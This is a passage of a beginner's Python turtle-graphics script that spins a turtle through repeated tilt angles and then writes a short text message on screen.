tommy.goto(0, 150)
tommy.speed(3)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
Turtle.settiltangle(tommy, 20)
Turtle.settiltangle(tommy, 40)
Turtle.settiltangle(tommy, 60)
Turtle.settiltangle(tommy, 80)
Turtle.settiltangle(tommy, 100)
Turtle.settiltangle(tommy, 120)
Turtle.settiltangle(tommy, 140)
Turtle.settiltangle(tommy, 160)
Turtle.settiltangle(tommy, 180)
Turtle.settiltangle(tommy, 200)
Turtle.settiltangle(tommy, 220)
Turtle.settiltangle(tommy, 240)
Turtle.settiltangle(tommy, 260)
Turtle.settiltangle(tommy, 280)
Turtle.settiltangle(tommy, 300)
Turtle.settiltangle(tommy, 320)
Turtle.settiltangle(tommy, 340)
Turtle.settiltangle(tommy, 360)
# Write a little message:
tommy.penup()
tommy.goto(0, 100)
tommy.color("black")
tommy.write("XXXXXXXX lmao", None, "center", "16pt 20")
tommy.goto(0, -80)
# Try changing draw_circle to draw_square, draw_triangle, or draw_star
# The turtle program is finished
turtle.done()
# Dont close out GUI for (x) seconds
time.sleep(10) | python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.